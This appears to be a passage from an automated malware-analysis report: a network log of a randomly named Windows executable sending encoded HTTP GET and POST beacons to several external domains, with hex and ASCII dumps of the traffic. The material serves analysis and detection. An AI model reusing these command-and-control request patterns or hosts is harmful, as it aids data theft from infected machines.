                                  Data Raw: 34 68 3d 47 58 33 6e 38 37 7a 55 75 30 58 68 70 55 37 6c 32 49 2b 38 4b 4c 49 4a 4e 53 37 46 4a 32 55 52 6d 68 58 6a 4d 4f 53 79 45 59 6f 61 49 74 52 39 72 64 49 6a 47 78 2b 4e 70 7a 5a 32 34 51 69 72 67 75 53 59 57 48 79 6c 71 45 39 79 50 63 67 43 44 68 38 45 58 4c 4f 63 4f 67 45 37 4b 6c 71 43 51 36 48 6c 73 31 57 43 65 43 30 5a 55 68 4f 57 54 47 63 64 6f 61 49 31 30 32 6e 45 47 79 65 37 67 36 71 4f 4c 4d 42 6e 69 41 71 6b 41 50 73 34 6c 49 78 47 50 46 6c 31 4c 32 2b 63 68 73 76 4d 67 4f 32 57 57 39 59 30 4f 54 64 2f 66 59 4d 6f 59 32 77 44 6c 45 39 70 46 42 51 37 6d 57 52 52 2f 37 54 70 64 2b 4b 69 6c 56 44 46 4f 49 67 53 6e 5a 55 7a 73 68 34 41 6a 6b 68 52 79 70 6b 42 63 67 4c 32 4d 66 6f 2b 41 70 57 48 4b 66 72 5a 4b 70 31 45 70 66 38 45 49 64 64 68 36 51 36 6a 56 73 76 44 7a 77 44 6e 34 30 70 76 74 78 36 44 72 49 59 4b 73 38 46 54 7a 53 57 6a 68 79 4d 64 32 46 55 44 50 32 68 6f 63 36 6d 34 71 75 62 70 34 6f 6d 64 78 44 72 64 72 75 73 53 45 32 54 31 55 69 54 6f 78 51 69 4b 69 74 50 45 61 32 4d [TRUNCATED]
                                  Data Ascii: 4h=GX3n87zUu0XhpU7l2I+8KLIJNS7FJ2URmhXjMOSyEYoaItR9rdIjGx+NpzZ24QirguSYWHylqE9yPcgCDh8EXLOcOgE7KlqCQ6Hls1WCeC0ZUhOWTGcdoaI102nEGye7g6qOLMBniAqkAPs4lIxGPFl1L2+chsvMgO2WW9Y0OTd/fYMoY2wDlE9pFBQ7mWRR/7Tpd+KilVDFOIgSnZUzsh4AjkhRypkBcgL2Mfo+ApWHKfrZKp1Epf8EIddh6Q6jVsvDzwDn40pvtx6DrIYKs8FTzSWjhyMd2FUDP2hoc6m4qubp4omdxDrdrusSE2T1UiToxQiKitPEa2MrOH9eO170MVWbP7vhlGGI3hLr6qFP0oKRmr+2LTDveieNrB6eZAhX4oAxK62OnZtvnBKMFe4zuRWbC9zqPOy81d/2tyN+zwlPhLuqkkEvuritAS8F+3Zqd+vJJ15hedYp+n8IYt1syGWy6m1NM86rLBTbyunuehl9vc6pZIFlkFR3yMSrZfj9+7IQiISrPPwjMwVez3q49A17UfcYhKST+xUCAae8aKjj6A1frpgzxVdtR81cKix16ZFbXZL6H3HdP3okxlhQKbSmAcK9TUC9YUTlES6px16pD4NP2lO2EnAW7vcJWROE19Uq2IQ5E9EzJwbpYCEmDor4mrRT2w0jQTbEoXC1WULX+i7PGdHEaPRfgPDF20B3TSli71pNdqBtUlVwLSZycA6PzFWKgShtLBEFz2B994zTcTzMTNMJDTLVBNBBEXRrsN86UcG0x0n3zw/Fvr/56IkYiv5SJkrK9ninPM99vOkGhawC7CQZvB+hgflUiuYcIPT1Eb76ocZzQ19dNRnU4DTN4FGTLgPMh4yXXu7bXoT+IOZ945DJRzY79FifWdyahmpgX9g6IgorxhBkXLPIpT+zpycNYROdOwizjHKYZfZ3c0v9oFVdB/qxV2NFcbBjO/sQuKOjRy7ikkXS+AxrFUa/RroC48/aG6oA6BJcpIH2w [TRUNCATED]


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  16192.168.2.7497273.33.130.190806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:35:13.556117058 CEST488OUTGET /ff4v/?4h=LVfH/OXwoF79o2r68Z//edB1CD2wHwJvvAzVR8ioN4kZT9t7ttcPOR+uxhJHzze41PCTSWmMujBUW/EaEzEZD5zZNBA7OVz8Vpr8h3iEYlpLT06Bb1IAlYNp8C2ydDS2jK3yMNhnhgns&623=YLI8v8eXd0Y HTTP/1.1
                                  Host: www.duobao698.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:35:14.035862923 CEST414INHTTP/1.1 200 OK
                                  Server: openresty
                                  Date: Mon, 27 May 2024 10:35:13 GMT
                                  Content-Type: text/html
                                  Content-Length: 274
                                  Connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 34 68 3d 4c 56 66 48 2f 4f 58 77 6f 46 37 39 6f 32 72 36 38 5a 2f 2f 65 64 42 31 43 44 32 77 48 77 4a 76 76 41 7a 56 52 38 69 6f 4e 34 6b 5a 54 39 74 37 74 74 63 50 4f 52 2b 75 78 68 4a 48 7a 7a 65 34 31 50 43 54 53 57 6d 4d 75 6a 42 55 57 2f 45 61 45 7a 45 5a 44 35 7a 5a 4e 42 41 37 4f 56 7a 38 56 70 72 38 68 33 69 45 59 6c 70 4c 54 30 36 42 62 31 49 41 6c 59 4e 70 38 43 32 79 64 44 53 32 6a 4b 33 79 4d 4e 68 6e 68 67 6e 73 26 36 32 33 3d 59 4c 49 38 76 38 65 58 64 30 59 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?4h=LVfH/OXwoF79o2r68Z//edB1CD2wHwJvvAzVR8ioN4kZT9t7ttcPOR+uxhJHzze41PCTSWmMujBUW/EaEzEZD5zZNBA7OVz8Vpr8h3iEYlpLT06Bb1IAlYNp8C2ydDS2jK3yMNhnhgns&623=YLI8v8eXd0Y"}</script></head></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  17192.168.2.749728199.59.243.225806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:35:19.256022930 CEST769OUTPOST /61qh/ HTTP/1.1
                                  Host: www.drdavidglassman.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.drdavidglassman.com
                                  Connection: close
                                  Content-Length: 215
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.drdavidglassman.com/61qh/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 36 6d 41 67 44 43 6d 66 42 77 67 6a 4a 48 6d 51 73 4d 71 39 76 74 59 52 6a 71 69 47 56 4e 6f 63 6d 35 45 70 45 6a 32 58 64 51 50 70 57 4c 34 4e 63 58 4f 56 52 6e 42 68 52 47 41 77 49 2f 71 41 6b 74 53 6d 2f 57 50 2f 6b 4c 64 78 52 61 58 4c 48 76 51 55 45 71 6f 78 47 72 6f 69 56 58 7a 71 63 65 45 4b 4c 50 78 57 58 45 64 34 34 64 2f 52 7a 32 48 6f 44 6e 53 61 6d 67 55 4d 65 6b 78 45 4c 4e 37 4c 72 58 56 78 34 64 59 4f 4b 4e 48 72 2f 38 57 72 45 35 71 79 71 6e 33 67 56 43 35 6f 61 4e 55 56 4f 36 67 51 55 5a 62 54 30 6f 67 39 58 76 2f 56 46 55 76 55 52 38 38 64 63 54 4b 75 74 55 39 39 69 74 53 44 4e 36 41 67 30 71 64 54 67 51 3d 3d
                                  Data Ascii: 4h=6mAgDCmfBwgjJHmQsMq9vtYRjqiGVNocm5EpEj2XdQPpWL4NcXOVRnBhRGAwI/qAktSm/WP/kLdxRaXLHvQUEqoxGroiVXzqceEKLPxWXEd44d/Rz2HoDnSamgUMekxELN7LrXVx4dYOKNHr/8WrE5qyqn3gVC5oaNUVO6gQUZbT0og9Xv/VFUvUR88dcTKutU99itSDN6Ag0qdTgQ==
                                  May 27, 2024 12:35:19.724857092 CEST1236INHTTP/1.1 200 OK
                                  date: Mon, 27 May 2024 10:35:19 GMT
                                  content-type: text/html; charset=utf-8
                                  content-length: 1142
                                  x-request-id: c2bd879e-fe3b-47f1-9777-d06ee4b6cb26
                                  cache-control: no-store, max-age=0
                                  accept-ch: sec-ch-prefers-color-scheme
                                  critical-ch: sec-ch-prefers-color-scheme
                                  vary: sec-ch-prefers-color-scheme
                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kKbi7a7KSvzC8ZHooZk47ntWva6e8enTx16ak6pdRIE34IpDw3TODTTx2bh+PJR6pL6B+NqnRMxHunbammF7KA==
                                  set-cookie: parking_session=c2bd879e-fe3b-47f1-9777-d06ee4b6cb26; expires=Mon, 27 May 2024 10:50:19 GMT; path=/
                                  connection: close
                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 4b 62 69 37 61 37 4b 53 76 7a 43 38 5a 48 6f 6f 5a 6b 34 37 6e 74 57 76 61 36 65 38 65 6e 54 78 31 36 61 6b 36 70 64 52 49 45 33 34 49 70 44 77 33 54 4f 44 54 54 78 32 62 68 2b 50 4a 52 36 70 4c 36 42 2b 4e 71 6e 52 4d 78 48 75 6e 62 61 6d 6d 46 37 4b 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kKbi7a7KSvzC8ZHooZk47ntWva6e8enTx16ak6pdRIE34IpDw3TODTTx2bh+PJR6pL6B+NqnRMxHunbammF7KA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                  May 27, 2024 12:35:19.724878073 CEST595INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzJiZDg3OWUtZmUzYi00N2YxLTk3NzctZDA2ZWU0YjZjYjI2IiwicGFnZV90aW1lIjoxNzE2ODA2MT


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  18192.168.2.749729199.59.243.225806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:35:21.787390947 CEST789OUTPOST /61qh/ HTTP/1.1
                                  Host: www.drdavidglassman.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.drdavidglassman.com
                                  Connection: close
                                  Content-Length: 235
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.drdavidglassman.com/61qh/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 36 6d 41 67 44 43 6d 66 42 77 67 6a 49 6e 32 51 75 76 43 39 6d 74 59 57 76 4b 69 47 62 74 6f 51 6d 35 59 70 45 6e 47 2b 64 6a 72 70 58 72 49 4e 4f 45 57 56 57 6e 42 68 46 57 41 50 48 66 71 58 6b 74 4f 59 2f 55 4c 2f 6b 4c 4a 78 52 66 72 4c 47 63 34 54 47 36 6f 7a 4a 4c 6f 67 4b 6e 7a 71 63 65 45 4b 4c 50 6b 65 58 45 56 34 2f 73 50 52 31 54 72 70 50 48 53 5a 6c 67 55 4d 55 30 77 4e 4c 4e 37 35 72 57 49 6d 34 62 55 4f 4b 49 37 72 2b 74 57 6f 4e 35 71 30 6b 48 33 2f 54 52 64 6b 62 49 6f 6c 4b 73 74 4d 54 5a 6a 4c 31 65 39 66 4e 4e 7a 35 62 46 58 76 56 2b 59 72 4c 31 58 62 76 56 35 6c 76 50 6d 69 53 4e 6c 4b 35 34 38 58 32 6a 32 79 77 39 62 36 48 66 45 45 4e 58 2f 41 4f 59 53 79 51 51 63 3d
                                  Data Ascii: 4h=6mAgDCmfBwgjIn2QuvC9mtYWvKiGbtoQm5YpEnG+djrpXrINOEWVWnBhFWAPHfqXktOY/UL/kLJxRfrLGc4TG6ozJLogKnzqceEKLPkeXEV4/sPR1TrpPHSZlgUMU0wNLN75rWIm4bUOKI7r+tWoN5q0kH3/TRdkbIolKstMTZjL1e9fNNz5bFXvV+YrL1XbvV5lvPmiSNlK548X2j2yw9b6HfEENX/AOYSyQQc=
                                  May 27, 2024 12:35:22.257164001 CEST1236INHTTP/1.1 200 OK
                                  date: Mon, 27 May 2024 10:35:21 GMT
                                  content-type: text/html; charset=utf-8
                                  content-length: 1142
                                  x-request-id: b2d7d3a0-8243-40e9-8fd3-f0f0df7343b2
                                  cache-control: no-store, max-age=0
                                  accept-ch: sec-ch-prefers-color-scheme
                                  critical-ch: sec-ch-prefers-color-scheme
                                  vary: sec-ch-prefers-color-scheme
                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kKbi7a7KSvzC8ZHooZk47ntWva6e8enTx16ak6pdRIE34IpDw3TODTTx2bh+PJR6pL6B+NqnRMxHunbammF7KA==
                                  set-cookie: parking_session=b2d7d3a0-8243-40e9-8fd3-f0f0df7343b2; expires=Mon, 27 May 2024 10:50:22 GMT; path=/
                                  connection: close
                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 4b 62 69 37 61 37 4b 53 76 7a 43 38 5a 48 6f 6f 5a 6b 34 37 6e 74 57 76 61 36 65 38 65 6e 54 78 31 36 61 6b 36 70 64 52 49 45 33 34 49 70 44 77 33 54 4f 44 54 54 78 32 62 68 2b 50 4a 52 36 70 4c 36 42 2b 4e 71 6e 52 4d 78 48 75 6e 62 61 6d 6d 46 37 4b 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kKbi7a7KSvzC8ZHooZk47ntWva6e8enTx16ak6pdRIE34IpDw3TODTTx2bh+PJR6pL6B+NqnRMxHunbammF7KA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                  May 27, 2024 12:35:22.257313967 CEST595INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjJkN2QzYTAtODI0My00MGU5LThmZDMtZjBmMGRmNzM0M2IyIiwicGFnZV90aW1lIjoxNzE2ODA2MT


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  19192.168.2.749730199.59.243.225806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:35:24.320874929 CEST1802OUTPOST /61qh/ HTTP/1.1
                                  Host: www.drdavidglassman.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.drdavidglassman.com
                                  Connection: close
                                  Content-Length: 1247
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.drdavidglassman.com/61qh/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 36 6d 41 67 44 43 6d 66 42 77 67 6a 49 6e 32 51 75 76 43 39 6d 74 59 57 76 4b 69 47 62 74 6f 51 6d 35 59 70 45 6e 47 2b 64 6a 6a 70 58 5a 41 4e 63 30 71 56 58 6e 42 68 61 6d 41 4f 48 66 71 57 6b 74 57 69 2f 55 48 46 6b 4a 78 78 44 4e 54 4c 42 74 34 54 4d 36 6f 7a 4c 4c 6f 68 56 58 7a 37 63 65 56 43 4c 50 30 65 58 45 56 34 2f 76 58 52 79 47 48 70 4a 48 53 61 6d 67 55 49 65 6b 77 6c 4c 4a 58 44 72 56 6b 32 34 72 30 4f 4e 6f 4c 72 79 2f 2b 6f 52 70 71 32 6e 48 32 71 54 52 67 36 62 4d 41 50 4b 73 77 70 54 65 50 4c 30 4a 78 43 52 38 79 6c 41 53 2f 43 5a 66 34 57 64 31 58 37 69 6b 5a 34 6f 73 57 57 4f 63 64 67 69 65 49 76 6a 58 66 4c 33 73 58 6c 4a 39 30 6f 64 53 36 49 66 74 43 34 52 47 62 4f 4e 46 6f 68 59 59 37 46 2f 79 49 75 51 65 4e 53 52 68 4d 58 32 41 39 38 6e 30 56 34 50 49 45 6f 73 49 35 77 48 45 32 38 64 44 4b 61 75 6b 37 63 2f 48 6f 74 38 58 78 6f 51 61 46 51 36 32 6e 32 61 6b 48 73 46 33 6f 73 58 47 61 72 35 42 6f 49 4b 69 50 5a 48 69 4d 52 6f 56 64 4a 2f 75 39 79 2b 31 58 68 76 36 69 [TRUNCATED]
                                  Data Ascii: 4h=6mAgDCmfBwgjIn2QuvC9mtYWvKiGbtoQm5YpEnG+djjpXZANc0qVXnBhamAOHfqWktWi/UHFkJxxDNTLBt4TM6ozLLohVXz7ceVCLP0eXEV4/vXRyGHpJHSamgUIekwlLJXDrVk24r0ONoLry/+oRpq2nH2qTRg6bMAPKswpTePL0JxCR8ylAS/CZf4Wd1X7ikZ4osWWOcdgieIvjXfL3sXlJ90odS6IftC4RGbONFohYY7F/yIuQeNSRhMX2A98n0V4PIEosI5wHE28dDKauk7c/Hot8XxoQaFQ62n2akHsF3osXGar5BoIKiPZHiMRoVdJ/u9y+1Xhv6i23yvWJlxwM5bExXYbNsVUWu6wPXDIOEdLZzrcZ5+W/G5Ve0lHg4VHtr/3NqO7MoJmF5BlvmEyzeLjSY1n5NPgnI8rcHTRkbcfyRJNO6zFTlK7CqwK44DQE0cUEOBpOhGwX10gfOWVXB6vLERorKIx/zIloYJlJz6TViobDKrmoXH3qTds9ycm2oy4ilI8RfhhcsK/51eRicvyDwK3bvqzHxwt67uSWXj5rN40sdUqWNJ2DH/LoM9AFOGu9vLmQMF/HW2e4swhqpd7wJGHX9IwAXVSpsWVzP/2ZBwiiFm/8Nk6ivCTaqLTFf6lN14gkLpI6s9Vh+t7u4gvj6Q8YyzXQKAOxSEkm3/4h1WiyXAZtNQkJ54cwpidSR/ZGp1BZCDm1ImkkkuVC6irY2uCjSGAmjKzU60p3xeTgPo8Z870HfzhkSfz+Kkwig0kfPbfTdr7HqWaGmTxq8rWrH2s3SMn+YOS7rpjSgTlfsQu6IpS4mHC6iV1V/6dEwLpXjRIIebHu7jiRGWOyTKno/hEu78tefUVUjZfZpFRwb2alII37mwAbqiDd2V7UYiw6NsHsCWf8YF7b8Dofa7nR26zeLmqkm6zs64/zTwGe/jvCHMXoDkMljbRqv1xD1gxOXwMlJiw2CFJOA+GLQ9TBIQqV1OQdPsmkZfm0dT+d [TRUNCATED]
                                  May 27, 2024 12:35:24.774677992 CEST1236INHTTP/1.1 200 OK
                                  date: Mon, 27 May 2024 10:35:24 GMT
                                  content-type: text/html; charset=utf-8
                                  content-length: 1142
                                  x-request-id: 4de8139d-4cdc-41f7-aac3-38e2233cee95
                                  cache-control: no-store, max-age=0
                                  accept-ch: sec-ch-prefers-color-scheme
                                  critical-ch: sec-ch-prefers-color-scheme
                                  vary: sec-ch-prefers-color-scheme
                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kKbi7a7KSvzC8ZHooZk47ntWva6e8enTx16ak6pdRIE34IpDw3TODTTx2bh+PJR6pL6B+NqnRMxHunbammF7KA==
                                  set-cookie: parking_session=4de8139d-4cdc-41f7-aac3-38e2233cee95; expires=Mon, 27 May 2024 10:50:24 GMT; path=/
                                  connection: close
                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 4b 62 69 37 61 37 4b 53 76 7a 43 38 5a 48 6f 6f 5a 6b 34 37 6e 74 57 76 61 36 65 38 65 6e 54 78 31 36 61 6b 36 70 64 52 49 45 33 34 49 70 44 77 33 54 4f 44 54 54 78 32 62 68 2b 50 4a 52 36 70 4c 36 42 2b 4e 71 6e 52 4d 78 48 75 6e 62 61 6d 6d 46 37 4b 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kKbi7a7KSvzC8ZHooZk47ntWva6e8enTx16ak6pdRIE34IpDw3TODTTx2bh+PJR6pL6B+NqnRMxHunbammF7KA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                  May 27, 2024 12:35:24.774734020 CEST595INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNGRlODEzOWQtNGNkYy00MWY3LWFhYzMtMzhlMjIzM2NlZTk1IiwicGFnZV90aW1lIjoxNzE2ODA2MT


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  20192.168.2.749731199.59.243.225806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:35:26.855751038 CEST494OUTGET /61qh/?4h=3koAA3SOIywIBRC3td/m9uAOoJ2vUr08254YEzy+UHnBLa5Tf1e0Y2d1G2geOsid5v6Dlmz0jNB7DtbaJOUrRYZ3Loo9fHLeEOQbNs9kRl4b14/G3iavBmGoo3V0HXEiPICNmWgJ3+Za&623=YLI8v8eXd0Y HTTP/1.1
                                  Host: www.drdavidglassman.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:35:27.330077887 CEST1236INHTTP/1.1 200 OK
                                  date: Mon, 27 May 2024 10:35:27 GMT
                                  content-type: text/html; charset=utf-8
                                  content-length: 1522
                                  x-request-id: 4309756b-0b3b-4b35-8f74-1e2177d42eed
                                  cache-control: no-store, max-age=0
                                  accept-ch: sec-ch-prefers-color-scheme
                                  critical-ch: sec-ch-prefers-color-scheme
